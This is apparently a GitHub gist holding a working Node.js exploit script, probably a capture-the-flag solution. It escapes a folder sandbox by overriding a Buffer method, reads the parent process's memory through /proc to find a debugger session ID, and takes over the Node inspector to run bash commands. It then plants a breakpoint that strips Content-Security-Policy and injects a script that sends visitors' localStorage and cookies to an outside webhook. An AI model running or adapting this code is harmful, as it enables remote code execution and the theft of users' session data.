i=s(361),r=s(685),{Duplex:o}=s(781),{createHash:n}=s(113),a=s(991),h=s(658),l=s(697),c=s(81),{GUID:d,kWebSocket:f}=s(742),u=/^[+/0-9A-Za-z]{22}==$/,$=0,p=1,m=2;class _ extends i{constructor(e,t){if(super(),null==(e={allowSynchronousEvents:!0,autoPong:!0,maxPayload:104857600,skipUTF8Validation:!1,perMessageDeflate:!1,handleProtocols:null,clientTracking:!0,verifyClient:null,noServer:!1,backlog:null,server:null,host:null,path:null,port:null,WebSocket:c,...e}).port&&!e.server&&!e.noServer||null!=e.port&&(e.server||e.noServer)||e.server&&e.noServer)throw TypeError('One and only one of the "port", "server", or "noServer" options must be specified');if(null!=e.port?(this._server=r.createServer((e,t)=>{let s=r.STATUS_CODES[426];t.writeHead(426,{"Content-Length":s.length,"Content-Type":"text/plain"}),t.end(s)}),this._server.listen(e.port,e.host,e.backlog,t)):e.server&&(this._server=e.server),this._server){let s=this.emit.bind(this,"connection");this._removeListeners=g(this._server,{listening:this.emit.bind(this,"listening"),error:this.emit.bind(this,"error"),upgrade:(e,t,i)=>{this.handleUpgrade(e,t,i,s)}})}!0===e.perMessageDeflate&&(e.perMessageDeflate={}),e.clientTracking&&(this.clients=new Set,this._shouldEmitClose=!1),this.options=e,this._state=$}address(){if(this.options.noServer)throw Error('The server is operating in "noServer" mode');return this._server?this._server.address():null}close(e){if(this._state===m){e&&this.once("close",()=>{e(Error("The server is not running"))}),process.nextTick(y,this);return}if(e&&this.once("close",e),this._state!==p){if(this._state=p,this.options.noServer||this.options.server)this._server&&(this._removeListeners(),this._removeListeners=this._server=null),this.clients&&this.clients.size?this._shouldEmitClose=!0:process.nextTick(y,this);else{let t=this._server;this._removeListeners(),this._removeListeners=this._server=null,t.close(()=>{y(this)})}}}shouldHandle(e){if(this.options.path){let t=e.url.indexOf("?"),s=-1!==t?e.url.slice(0,t):e.url;if(s!==this.options.path)return!1}return!0}handleUpgrade(e,t,s,i){t.on("error",x);let r=e.headers["sec-websocket-key"],o=e.headers.upgrade,n=+e.headers["sec-websocket-version"];if("GET"!==e.method){let c="Invalid HTTP method";b(this,e,t,405,c);return}if(void 0===o||"websocket"!==o.toLowerCase()){let d="Invalid Upgrade header";b(this,e,t,400,d);return}if(void 0===r||!u.test(r)){let f="Missing or invalid Sec-WebSocket-Key header";b(this,e,t,400,f);return}if(8!==n&&13!==n){let $="Missing or invalid Sec-WebSocket-Version header";b(this,e,t,400,$);return}if(!this.shouldHandle(e)){v(t,400);return}let p=e.headers["sec-websocket-protocol"],m=new Set;if(void 0!==p)try{m=l.parse(p)}catch(_){let g="Invalid Sec-WebSocket-Protocol header";b(this,e,t,400,g);return}let y=e.headers["sec-websocket-extensions"],S={};if(this.options.perMessageDeflate&&void 0!==y){let k=new h(this.options.perMessageDeflate,!0,this.options.maxPayload);try{let w=a.parse(y);w[h.extensionName]&&(k.accept(w[h.extensionName]),S[h.extensionName]=k)}catch(E){let C="Invalid or unacceptable Sec-WebSocket-Extensions header";b(this,e,t,400,C);return}}if(this.options.verifyClient){let T={origin:e.headers[`${8===n?"sec-websocket-origin":"origin"}`],secure:!!(e.socket.authorized||e.socket.encrypted),req:e};if(2===this.options.verifyClient.length){this.options.verifyClient(T,(o,n,a,h)=>{if(!o)return v(t,n||401,a,h);this.completeUpgrade(S,r,m,e,t,s,i)});return}if(!this.options.verifyClient(T))return v(t,401)}this.completeUpgrade(S,r,m,e,t,s,i)}completeUpgrade(e,t,s,i,r,o,l){if(!r.readable||!r.writable)return r.destroy();if(r[f])throw Error("server.handleUpgrade() was called more than once with the same socket, possibly due to a misconfiguration");if(this._state>$)return v(r,503);let c=n("sha1").update(t+d).digest("base64"),u=["HTTP/1.1 101 Switching Protocols","Upgrade: websocket","Connection: Upgrade",`Sec-WebSocket-Accept: ${c}`],p=new this.options.WebSocket(null,void 0,this.options);if(s.size){let m=this.options.handleProtocols?this.options.handleProtocols(s,i):s.values().next().value;m&&(u.push(`Sec-WebSocket-Protocol: ${m}`),p._protocol=m)}if(e[h.extensionName]){let _=e[h.extensionName].params,g=a.format({[h.extensionName]:[_]});u.push(`Sec-WebSocket-Extensions: ${g}`),p._extensions=e}this.emit("headers",u,i),r.write(u.concat("\r\n").join("\r\n")),r.removeListener("error",x),p.setSocket(r,o,{allowSynchronousEvents:this.options.allowSynchronousEvents,maxPayload:this.options.maxPayload,skipUTF8Validation:this.options.skipUTF8Validation}),this.clients&&(this.clients.add(p),p.on("close",()=>{this.clients.delete(p),this._shouldEmitClose&&!this.clients.size&&process.nextTick(y,this)})),l(p,i)}}function g(e,t){for(let s of Object.keys(t))e.on(s,t[s]);return function s(){for(let i of Object.keys(t))e.removeListener(i,t[i])}}function y(e){e._state=m,e.emit("close")}function x(){this.destroy()}function v(e,t,s,i){s=s||r.STATUS_CODES[t],i={Connection:"close","Content-Type":"text/html","Content-Length":Buffer.byteLength(s),...i},e.once("finish",e.destroy),e.end(`HTTP/1.1 ${t} ${r.STATUS_CODES[t]}\r
`+Object.keys(i).map(e=>`${e}: ${i[e]}`).join("\r\n")+"\r\n\r\n"+s)}function b(e,t,s,i,r){if(e.listenerCount("wsClientError")){let o=Error(r);Error.captureStackTrace(o,b),e.emit("wsClientError",o,s,t)}else v(s,i,r)}e.exports=_},81(e,t,s){"use strict";let i=s(361),r=s(687),o=s(685),n=s(808),a=s(404),{randomBytes:h,createHash:l}=s(113),{Duplex:c,Readable:d}=s(781),{URL:f}=s(310),u=s(658),$=s(315),p=s(675),{isBlob:m}=s(883),{BINARY_TYPES:_,EMPTY_BUFFER:g,GUID:y,kForOnEventAttribute:x,kListener:v,kStatusCode:b,kWebSocket:S,NOOP:k}=s(742),{EventTarget:{addEventListener:w,removeEventListener:E}}=s(463),{format:C,parse:T}=s(991),{toBuffer:N}=s(728),L=3e4,O=Symbol("kAborted"),P=[8,13],U=["CONNECTING","OPEN","CLOSING","CLOSED"],I=/^[!#$%&'*+\-.0-9A-Z^_`|a-z~]+$/;class D extends i{constructor(e,t,s){super(),this._binaryType=_[0],this._closeCode=1006,this._closeFrameReceived=!1,this._closeFrameSent=!1,this._closeMessage=g,this._closeTimer=null,this._errorEmitted=!1,this._extensions={},this._paused=!1,this._protocol="",this._readyState=D.CONNECTING,this._receiver=null,this._sender=null,this._socket=null,null!==e?(this._bufferedAmount=0,this._isServer=!1,this._redirects=0,void 0===t?t=[]:Array.isArray(t)||("object"==typeof t&&null!==t?(s=t,t=[]):t=[t]),R(this,e,t,s)):(this._autoPong=s.autoPong,this._isServer=!0)}get binaryType(){return this._binaryType}set binaryType(e){_.includes(e)&&(this._binaryType=e,this._receiver&&(this._receiver._binaryType=e))}get bufferedAmount(){return this._socket?this._socket._writableState.length+this._sender._bufferedBytes:this._bufferedAmount}get extensions(){return Object.keys(this._extensions).join()}get isPaused(){return this._paused}get onclose(){return null}get onerror(){return null}get onopen(){return null}get onmessage(){return null}get protocol(){return this._protocol}get readyState(){return this._readyState}get url(){return this._url}setSocket(e,t,s){let i=new $({allowSynchronousEvents:s.allowSynchronousEvents,binaryType:this.binaryType,extensions:this._extensions,isServer:this._isServer,maxPayload:s.maxPayload,skipUTF8Validation:s.skipUTF8Validation}),r=new p(e,this._extensions,s.generateMask);this._receiver=i,this._sender=r,this._socket=e,i[S]=this,r[S]=this,e[S]=this,i.on("conclude",G),i.on("drain",V),i.on("error",q),i.on("message",j),i.on("ping",H),i.on("pong",X),r.onerror=Z,e.setTimeout&&e.setTimeout(0),e.setNoDelay&&e.setNoDelay(),t.length>0&&e.unshift(t),e.on("close",J),e.on("data",Q),e.on("end",ee),e.on("error",et),this._readyState=D.OPEN,this.emit("open")}emitClose(){if(!this._socket){this._readyState=D.CLOSED,this.emit("close",this._closeCode,this._closeMessage);return}this._extensions[u.extensionName]&&this._extensions[u.extensionName].cleanup(),this._receiver.removeAllListeners(),this._readyState=D.CLOSED,this.emit("close",this._closeCode,this._closeMessage)}close(e,t){if(this.readyState!==D.CLOSED){if(this.readyState===D.CONNECTING){let s="WebSocket was closed before the connection was established";A(this,this._req,s);return}if(this.readyState===D.CLOSING){this._closeFrameSent&&(this._closeFrameReceived||this._receiver._writableState.errorEmitted)&&this._socket.end();return}this._readyState=D.CLOSING,this._sender.close(e,t,!this._isServer,e=>{!e&&(this._closeFrameSent=!0,(this._closeFrameReceived||this._receiver._writableState.errorEmitted)&&this._socket.end())}),Y(this)}}pause(){this.readyState!==D.CONNECTING&&this.readyState!==D.CLOSED&&(this._paused=!0,this._socket.pause())}ping(e,t,s){if(this.readyState===D.CONNECTING)throw Error("WebSocket is not open: readyState 0 (CONNECTING)");if("function"==typeof e?(s=e,e=t=void 0):"function"==typeof t&&(s=t,t=void 0),"number"==typeof e&&(e=e.toString()),this.readyState!==D.OPEN){F(this,e,s);return}void 0===t&&(t=!this._isServer),this._sender.ping(e||g,t,s)}pong(e,t,s){if(this.readyState===D.CONNECTING)throw Error("WebSocket is not open: readyState 0 (CONNECTING)");if("function"==typeof e?(s=e,e=t=void 0):"function"==typeof t&&(s=t,t=void 0),"number"==typeof e&&(e=e.toString()),this.readyState!==D.OPEN){F(this,e,s);return}void 0===t&&(t=!this._isServer),this._sender.pong(e||g,t,s)}resume(){this.readyState!==D.CONNECTING&&this.readyState!==D.CLOSED&&(this._paused=!1,this._receiver._writableState.needDrain||this._socket.resume())}send(e,t,s){if(this.readyState===D.CONNECTING)throw Error("WebSocket is not open: readyState 0 (CONNECTING)");if("function"==typeof t&&(s=t,t={}),"number"==typeof e&&(e=e.toString()),this.readyState!==D.OPEN){F(this,e,s);return}let i={binary:"string"!=typeof e,mask:!this._isServer,compress:!0,fin:!0,...t};this._extensions[u.extensionName]||(i.compress=!1),this._sender.send(e||g,i,s)}terminate(){if(this.readyState!==D.CLOSED){if(this.readyState===D.CONNECTING){let e="WebSocket was closed before the connection was established";A(this,this._req,e);return}this._socket&&(this._readyState=D.CLOSING,this._socket.destroy())}}}function R(e,t,s,i){let n={allowSynchronousEvents:!0,autoPong:!0,protocolVersion:P[1],maxPayload:104857600,skipUTF8Validation:!1,perMessageDeflate:!0,followRedirects:!1,maxRedirects:10,...i,socketPath:void 0,hostname:void 0,protocol:void 0,timeout:void 0,method:"GET",host:void 0,path:void 0,port:void 0};if(e._autoPong=n.autoPong,!P.includes(n.protocolVersion))throw RangeError(`Unsupported protocol version: ${n.protocolVersion} (supported versions: ${P.join(", ")})`);let a;if(t instanceof f)a=t;else try{a=new f(t)}catch(c){throw SyntaxError(`Invalid URL: ${t}`)}"http:"===a.protocol?a.protocol="ws:":"https:"===a.protocol&&(a.protocol="wss:"),e._url=a.href;let d="wss:"===a.protocol,$="ws+unix:"===a.protocol,p;if("ws:"===a.protocol||d||$?$&&!a.pathname?p="The URL's pathname is empty":a.hash&&(p="The URL contains a fragment identifier"):p='The URL\'s protocol must be one of "ws:", "wss:", "http:", "https", or "ws+unix:"',p){let m=SyntaxError(p);if(0===e._redirects)throw m;W(e,m);return}let _=d?443:80,g=h(16).toString("base64"),x=d?r.request:o.request,v=new Set,b;if(n.createConnection=n.createConnection||(d?M:B),n.defaultPort=n.defaultPort||_,n.port=a.port||_,n.host=a.hostname.startsWith("[")?a.hostname.slice(1,-1):a.hostname,n.headers={...n.headers,"Sec-WebSocket-Version":n.protocolVersion,"Sec-WebSocket-Key":g,Connection:"Upgrade",Upgrade:"websocket"},n.path=a.pathname+a.search,n.timeout=n.handshakeTimeout,n.perMessageDeflate&&(b=new u(!0!==n.perMessageDeflate?n.perMessageDeflate:{},!1,n.maxPayload),n.headers["Sec-WebSocket-Extensions"]=C({[u.extensionName]:b.offer()})),s.length){for(let S of s){if("string"!=typeof S||!I.test(S)||v.has(S))throw SyntaxError("An invalid or duplicated subprotocol was specified");v.add(S)}n.headers["Sec-WebSocket-Protocol"]=s.join(",")}if(n.origin&&(n.protocolVersion<13?n.headers["Sec-WebSocket-Origin"]=n.origin:n.headers.Origin=n.origin),(a.username||a.password)&&(n.auth=`${a.username}:${a.password}`),$){let k=n.path.split(":");n.socketPath=k[0],n.path=k[1]}let w;if(n.followRedirects){if(0===e._redirects){e._originalIpc=$,e._originalSecure=d,e._originalHostOrSocketPath=$?n.socketPath:a.host;let E=i&&i.headers;if(i={...i,headers:{}},E)for(let[N,L]of Object.entries(E))i.headers[N.toLowerCase()]=L}else if(0===e.listenerCount("redirect")){let U=$?!!e._originalIpc&&n.socketPath===e._originalHostOrSocketPath:!e._originalIpc&&a.host===e._originalHostOrSocketPath;U&&(!e._originalSecure||d)||(delete n.headers.authorization,delete n.headers.cookie,U||delete n.headers.host,n.auth=void 0)}n.auth&&!i.headers.authorization&&(i.headers.authorization="Basic "+Buffer.from(n.auth).toString("base64")),w=e._req=x(n),e._redirects&&e.emit("redirect",e.url,w)}else w=e._req=x(n);n.timeout&&w.on("timeout",()=>{A(e,w,"Opening handshake has timed out")}),w.on("error",t=>{null===w||w[O]||(w=e._req=null,W(e,t))}),w.on("response",r=>{let o=r.headers.location,a=r.statusCode;if(o&&n.followRedirects&&a>=300&&a<400){if(++e._redirects>n.maxRedirects){A(e,w,"Maximum redirects exceeded");return}w.abort();let h;try{h=new f(o,t)}catch(l){let c=SyntaxError(`Invalid URL: ${o}`);W(e,c);return}R(e,h,s,i)}else e.emit("unexpected-response",w,r)||A(e,w,`Unexpected server response: ${r.statusCode}`)}),w.on("upgrade",(t,s,i)=>{if(e.emit("upgrade",t),e.readyState!==D.CONNECTING)return;w=e._req=null;let r=t.headers.upgrade;if(void 0===r||"websocket"!==r.toLowerCase()){A(e,s,"Invalid Upgrade header");return}let o=l("sha1").update(g+y).digest("base64");if(t.headers["sec-websocket-accept"]!==o){A(e,s,"Invalid Sec-WebSocket-Accept header");return}let a=t.headers["sec-websocket-protocol"],h;if(void 0!==a?v.size?v.has(a)||(h="Server sent an invalid subprotocol"):h="Server sent a subprotocol but none was requested":v.size&&(h="Server sent no subprotocol"),h){A(e,s,h);return}a&&(e._protocol=a);let c=t.headers["sec-websocket-extensions"];if(void 0!==c){if(!b){let d="Server sent a Sec-WebSocket-Extensions header but no extension was requested";A(e,s,d);return}let f;try{f=T(c)}catch($){let p="Invalid Sec-WebSocket-Extensions header";A(e,s,p);return}let m=Object.keys(f);if(1!==m.length||m[0]!==u.extensionName){let _="Server indicated an extension that was not requested";A(e,s,_);return}try{b.accept(f[u.extensionName])}catch(x){let S="Invalid Sec-WebSocket-Extensions header";A(e,s,S);return}e._extensions[u.extensionName]=b}e.setSocket(s,i,{allowSynchronousEvents:n.allowSynchronousEvents,generateMask:n.generateMask,maxPayload:n.maxPayload,skipUTF8Validation:n.skipUTF8Validation})}),n.finishRequest?n.finishRequest(w,e):w.end()}function W(e,t){e._readyState=D.CLOSING,e._errorEmitted=!0,e.emit("error",t),e.emitClose()}function B(e){return e.path=e.socketPath,n.connect(e)}function M(e){return e.path=void 0,e.servername||""===e.servername||(e.servername=n.isIP(e.host)?"":e.host),a.connect(e)}function A(e,t,s){e._readyState=D.CLOSING;let i=Error(s);Error.captureStackTrace(i,A),t.setHeader?(t[O]=!0,t.abort(),t.socket&&!t.socket.destroyed&&t.socket.destroy(),process.nextTick(W,e,i)):(t.destroy(i),t.once("error",e.emit.bind(e,"error")),t.once("close",e.emitClose.bind(e)))}function F(e,t,s){if(t){let i=m(t)?t.size:N(t).length;e._socket?e._sender._bufferedBytes+=i:e._bufferedAmount+=i}if(s){let r=Error(`WebSocket is not open: readyState ${e.readyState} (${U[e.readyState]})`);process.nextTick(s,r)}}function G(e,t){let s=this[S];s._closeFrameReceived=!0,s._closeMessage=t,s._closeCode=e,void 0!==s._socket[S]&&(s._socket.removeListener("data",Q),process.nextTick(K,s._socket),1005===e?s.close():s.close(e,t))}function V(){let e=this[S];e.isPaused||e._socket.resume()}function q(e){let t=this[S];void 0!==t._socket[S]&&(t._socket.removeListener("data",Q),process.nextTick(K,t._socket),t.close(e[b])),t._errorEmitted||(t._errorEmitted=!0,t.emit("error",e))}function z(){this[S].emitClose()}function j(e,t){this[S].emit("message",e,t)}function H(e){let t=this[S];t._autoPong&&t.pong(e,!this._isServer,k),t.emit("ping",e)}function X(e){this[S].emit("pong",e)}function K(e){e.resume()}function Z(e){let t=this[S];t.readyState===D.CLOSED||(t.readyState===D.OPEN&&(t._readyState=D.CLOSING,Y(t)),this._socket.end(),t._errorEmitted||(t._errorEmitted=!0,t.emit("error",e)))}function Y(e){e._closeTimer=setTimeout(e._socket.destroy.bind(e._socket),L)}function J(){let e=this[S];this.removeListener("close",J),this.removeListener("data",Q),this.removeListener("end",ee),e._readyState=D.CLOSING;let t;this._readableState.endEmitted||e._closeFrameReceived||e._receiver._writableState.errorEmitted||null===(t=e._socket.read())||e._receiver.write(t),e._receiver.end(),this[S]=void 0,clearTimeout(e._closeTimer),e._receiver._writableState.finished||e._receiver._writableState.errorEmitted?e.emitClose():(e._receiver.on("error",z),e._receiver.on("finish",z))}function Q(e){this[S]._receiver.write(e)||this.pause()}function ee(){let e=this[S];e._readyState=D.CLOSING,e._receiver.end(),this.end()}function et(){let e=this[S];this.removeListener("error",et),this.on("error",k),e&&(e._readyState=D.CLOSING,this.destroy())}Object.defineProperty(D,"CONNECTING",{enumerable:!0,value:U.indexOf("CONNECTING")}),Object.defineProperty(D.prototype,"CONNECTING",{enumerable:!0,value:U.indexOf("CONNECTING")}),Object.defineProperty(D,"OPEN",{enumerable:!0,value:U.indexOf("OPEN")}),Object.defineProperty(D.prototype,"OPEN",{enumerable:!0,value:U.indexOf("OPEN")}),Object.defineProperty(D,"CLOSING",{enumerable:!0,value:U.indexOf("CLOSING")}),Object.defineProperty(D.prototype,"CLOSING",{enumerable:!0,value:U.indexOf("CLOSING")}),Object.defineProperty(D,"CLOSED",{enumerable:!0,value:U.indexOf("CLOSED")}),Object.defineProperty(D.prototype,"CLOSED",{enumerable:!0,value:U.indexOf("CLOSED")}),["binaryType","bufferedAmount","extensions","isPaused","protocol","readyState","url"].forEach(e=>{Object.defineProperty(D.prototype,e,{enumerable:!0})}),["open","error","close","message"].forEach(e=>{Object.defineProperty(D.prototype,`on${e}`,{enumerable:!0,get(){for(let t of this.listeners(e))if(t[x])return t[v];return null},set(t){for(let s of this.listeners(e))if(s[x]){this.removeListener(e,s);break}"function"==typeof t&&this.addEventListener(e,t,{[x]:!0})}})}),D.prototype.addEventListener=w,D.prototype.removeEventListener=E,e.exports=D},488(module){module.exports=eval("require")("bufferutil")},365(module){module.exports=eval("require")("utf-8-validate")},300(e){"use strict";e.exports=require("buffer")},113(e){"use strict";e.exports=require("crypto")},361(e){"use strict";e.exports=require("events")},685(e){"use strict";e.exports=require("http")},687(e){"use strict";e.exports=require("https")},808(e){"use strict";e.exports=require("net")},781(e){"use strict";e.exports=require("stream")},404(e){"use strict";e.exports=require("tls")},310(e){"use strict";e.exports=require("url")},796(e){"use strict";e.exports=require("zlib")}},__webpack_module_cache__={};function __nccwpck_require__(e){var t=__webpack_module_cache__[e];if(void 0!==t)return t.exports;var s=__webpack_module_cache__[e]={exports:{}},i=!0;try{__webpack_modules__[e](s,s.exports,__nccwpck_require__),i=!1}finally{i&&delete __webpack_module_cache__[e]}return s.exports}__nccwpck_require__.ab="/";var __webpack_exports__=__nccwpck_require__(296);globalThis.WebSocket=__webpack_exports__})();`;
eval(atob(wsPayload));
const WebSocket = globalThis.WebSocket;
const allowedFolder = process.cwd();
let target;
let targetBuf;
const originalUtf8Write = Buffer.prototype.utf8Write;
const overload = function(str, ...args) {
return originalUtf8Write.apply(this, [target, ...args]);
}
const setTarget = (f) => {
Buffer.prototype.utf8Write = originalUtf8Write;
target = allowedFolder + "/../.." + f;
targetBuf = Buffer.from(target + ".".repeat(40))
Buffer.prototype.utf8Write = overload;
};
const ppid = process.ppid;
// console.log("parent pid:", ppid);
setTarget(`/proc/${ppid}/maps`);
const parentMaps = fs.readFileSync(targetBuf).toString();
const heap = parentMaps.split("\n").find(l => l.includes("heap"));
// console.log(heap);
const base = parseInt(heap.split(" ")[0].split("-")[0], 16);
const end = parseInt(heap.split(" ")[0].split("-")[1], 16);
const len = end - base;
setTarget(`/proc/${ppid}/mem`);
const parentMemFd = fs.openSync(targetBuf);
Buffer.prototype.utf8Write = originalUtf8Write;
const buffer = Buffer.alloc(len);
fs.read(parentMemFd, buffer, 0, len, base, (err, bytesRead, buffer) => {
const data = buffer.toString();
const matches = data.match(/([0-9a-f]{8}-[0-9a-f]{4}-[4][0-9a-f]{3}-[89ab][0-9a-f]{3}-[0-9a-f]{12})/);
if (!matches) { return; }
console.log("gg", matches[1]);
const ws = new WebSocket(`ws://127.0.0.1:9229/${matches[1]}`);
const payload = btoa(`
${atob(wsPayload)}
console.log("hello from the other side");
const ws = new WebSocket("ws://127.0.0.1:9229/${matches[1]}");
ws.onopen = () => {
console.log("we open");
};
setInterval(() => {
ws.send(JSON.stringify({
id: 0,
method: 'Debugger.enable'
}));
}, 250);
ws.onmessage = (e) => {
console.log("message recv");
console.log(e.data);
};
setInterval(() => {
for (let lineNumber = 0; lineNumber < 32; lineNumber++) {
ws.send(JSON.stringify({
id: 1,
method: 'Debugger.setBreakpoint',
params: {
location: {
scriptId: "103",
lineNumber
},
condition: \`
(() => {
console.log("hihi");
if (res && next) {
console.log("byebye");
res.removeHeader("Content-Security-Policy");
res.send("<script>setInterval(() => { navigator.sendBeacon('https://webhook/', JSON.stringify(localStorage) + ' ' + document.cookie + ' ' + location.href); }, 1000);</script>");
next = () => {};
}
return false;
})()
\`
}
}));
}
}, 500);
`);
setTimeout(() => {
ws.send(JSON.stringify({
id: 0,
method: 'Runtime.evaluate',
params: {
expression: `
process.binding("spawn_sync").spawn({"args":["/usr/bin/bash","-c","echo ${payload} | base64 -d > /tmp/xd"],"file":"/usr/bin/bash","stdio":[{"type":"pipe","readable":true,"writable":false}]});
`
}
}));
}, 500);
setTimeout(() => {
ws.send(JSON.stringify({
id: 0,
method: 'Runtime.evaluate',
params: {
expression: `
process.binding("spawn_sync").spawn({"args":["/usr/bin/bash","-c","node /tmp/xd &"],"file":"/usr/bin/bash","stdio":[{"type":"pipe","readable":true,"writable":false}]});
`
}
}));
}, 1000);
});
setTimeout(() => {
process.kill();
}, 5_000)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment